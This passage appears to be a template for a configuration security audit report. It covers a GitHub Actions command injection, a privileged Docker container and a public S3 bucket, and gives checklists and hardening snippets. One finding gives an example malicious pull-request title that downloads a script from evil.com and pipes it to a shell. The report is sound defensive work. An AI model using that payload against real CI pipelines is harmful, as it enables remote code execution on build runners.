| Kubernetes | X | Y | Z | W |
| App Config | X | Y | Z | W |

## Technologies Detected

- Framework: [e.g., Next.js, Go/Gin]
- Container: Docker, Kubernetes
- CI/CD: GitHub Actions
- Cloud: AWS

## Critical Findings

### [CONFIG-001] GitHub Actions Command Injection

**Severity:** Critical
**Location:** `.github/workflows/pr.yml:23`

**Vulnerable Code:**
```yaml
- run: |
    echo "PR Title: ${{ github.event.pull_request.title }}"
```

**Attack:** Attacker creates PR with title: `"; curl evil.com/shell.sh | sh #`

**Remediation:**
```yaml
- run: echo "PR Title: $TITLE"
  env:
    TITLE: ${{ github.event.pull_request.title }}
```

### [CONFIG-002] Privileged Docker Container

**Severity:** Critical
**Location:** `docker-compose.yml:15`

**Vulnerable Code:**
```yaml
services:
  app:
    privileged: true
```

**Impact:** Container escape, host compromise

### [CONFIG-003] Public S3 Bucket

**Severity:** Critical
**Location:** `terraform/storage.tf:8`

## Docker Security Checklist

| Check | Status | File |
|---|---|---|
| Non-root user | FAIL | Dockerfile |
| No secrets in image | PASS | - |
| Pinned base image | FAIL | Dockerfile |
| Read-only filesystem | FAIL | docker-compose.yml |
| Dropped capabilities | FAIL | docker-compose.yml |

## CI/CD Security Checklist

| Check | Status | File |
|---|---|---|
| No command injection | FAIL | pr.yml |
| Minimal permissions | FAIL | build.yml |
| No secrets in logs | PASS | - |
| Verified actions only | WARN | deploy.yml |

## Kubernetes Security Checklist

| Check | Status | File |
|---|---|---|
| Non-root pods | FAIL | deployment.yaml |
| Network policies | MISSING | - |
| RBAC configured | WARN | rbac.yaml |
| Secrets encrypted | FAIL | secrets.yaml |

## Cloud Security Checklist

| Check | Status | Resource |
|---|---|---|
| No public buckets | FAIL | S3: data-bucket |
| Encrypted storage | PASS | EBS volumes |
| Restricted security groups | FAIL | sg-web |
| No hardcoded credentials | PASS | - |

## Recommendations

### Immediate Actions

- Fix GitHub Actions command injection
- Remove privileged mode from containers
- Make S3 bucket private
- Add USER directive to Dockerfile

### Security Hardening

```yaml
# Kubernetes container securityContext
securityContext:
  runAsNonRoot: true
  runAsUser: 1000
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  capabilities:
    drop: ["ALL"]
```

```yaml
# GitHub Actions least-privilege permissions
permissions:
  contents: read
  pull-requests: write
```
````

**Next Step:** Configuration issues are typically binary (secure or not) and don't require exploit verification.